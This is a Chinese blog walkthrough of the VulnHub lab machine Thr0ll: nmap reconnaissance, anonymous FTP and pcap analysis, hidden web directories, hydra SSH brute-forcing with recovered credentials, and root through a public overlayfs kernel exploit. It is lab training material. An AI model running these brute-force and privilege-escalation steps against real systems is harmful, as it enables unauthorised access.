vulnhub(6):Thr0ll(隐藏目录、hydra密码爆破、内核漏洞提权)

端口

nmap主机发现
nmap -sn 192.168.178.0/24
​
Nmap scan report for 192.168.178.33
Host is up (0.00020s latency).
​
33是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.178.33 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT        STATE       SERVICE
21/tcp      open        ftp
22/tcp      open        ssh   
80/tcp      open        http    
​
​
发现开放3个端口
nmap -sT -sC -sV -O -p21,22,80, -oA nmap/scan 192.168.178.33详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.178.47
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d618d9ef75d31c29be14b52b1854a9c0 (DSA)
|   2048 ee8c64874439538c24fe9d39a9adeadb (RSA)
|   256 0e66e650cf563b9c678b5f56caae6bf4 (ECDSA)
|_  256 b28be2465ceffddc72f7107e045f2585 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
​
分析:
21ftp端口可以匿名登录
80端口有/secret目录和robots.txt文件

立足

21端口
ftp 192.168.178.33
Anonymous登录
​
发现lol.pcap文件,下载:get lol.pcap
然后分析,这里面大多是tcp和ftp的包,tcp的都是握手包直接过滤,仅查看ftp和ftp-data包,如下图

这里可以看到有很多类似:PASS、SYST、PORT等的命令,可以通过如下网址进行解析:
https://www.serv-u.com/resources/tutorial/host-allo-prot-stru-type-auth-ccc-ftp-command

最主要是上面选中的三个包,RETR是客户端ftp的请求命令,服务器响应,ftp-data包里包含请求文件secret_stuff.txt文件的内容
如下,是ftp-data内容包含了secret_stuff.txt文件的内容

解析:他让我们把sup3rs3cr3tdirlol当作目录,在此之前我们应先尝试收集其他80端口信息
80端口
主页面就一张恶搞图片,源代码页面没有其他内容,图片也没有隐写什么东西(exiftools或strings跑一下)
robots.txt内容:Disallow: /secret
那么我们访问:http://192.168.178.33/secret/,情况根主页面一样,一张图,什么内容都没有
​
gobuster爆破目录,无任何新内容

利用收集到的sup3rs3cr3tdirlol信息

解析:他让我们把sup3rs3cr3tdirlol当作头,那么我们直接访问http://192.168.178.33/sup3rs3cr3tdirlol/
发现有个文件roflmao,wget下来,执行,显示如下结果:
Find address 0x0856BF to proceed 
​
解析:
这里说尝试0x0856BF地址,我以为要查看文件的0x0856BF地址,但这显然超出了文件范围,源文件只有7.1k。
其实它是让我们将0x0856BF作为网页目录输入,结果如下:
​
是一个目录,我将展示目录的所有内容,所以就不截图了
good_luck/目录下有个 which_one_lol.txt   文件
this_folder_contains_the_password/目录下有个Pass.txt文件
​
wget下来,查看其内容
Pass.txt内容:
Good_job_:)
​
which_one_lol.txt内容:
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
​
目前推测
Pass.txt存储密码,which_one_lol.txt存储用户名

尝试爆破

hydra -L which_one_lol.txt -P Pass.txt 192.168.178.33 ssh
​
爆破不出来,完了只能看walkthrough了,看看攻略怎么打吧
​
看完攻略后才知道,密码是Pass.txt,它其实是个文件名,但是文件名就是密码,博主解释说因为this_folder_contains_the-password意思是这个文件夹本身就是密码
​
那么我们将"Pass.txt"添加到Pass.txt,再来一次爆破吧
hydra -L which_one_lol.txt -P Pass.txt 192.168.178.33 ssh
​
成功了!
[22][ssh] host: 192.168.178.33   login: overflow   password: Pass.txt

提权

信息枚举

sudo -l:无权限
cat /etc/passwd:没有新的信息
cat /etc/crontab:无权限
find / -type f -perm -u=s 2>/dev/null:拿过去根gtfobins网址比对看看是否可提权,没有任何利用
服务敏感信息收集:没有任何服务的敏感信息
敏感历史信息收集:看到Thr0ll用户下的.vim隐藏文件,无权限打开
​
只能尝试:内核或服务漏洞提权

内核漏洞提权

信息枚举:
服务:
    vsftpd 3.0.2
    Apache/2.4.7
系统:
    linux 3.13.0-32-generic ubuntu
    
searchsploit查一下,ftp和apache没有提权漏洞利用
​
linux查一下:发现符合条件的漏洞有3个(其实是两个):
​
    Linux Kernel 3.13 - SGID Privilege Escalation
    Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
    Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access
    
3个都看看哪个最简单,发现第二个(是个.c文件)的最简单,编译运行即可,那我们直接传上去编译运行
gcc ./37292.c -o ofs
./ofs
直接root

  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值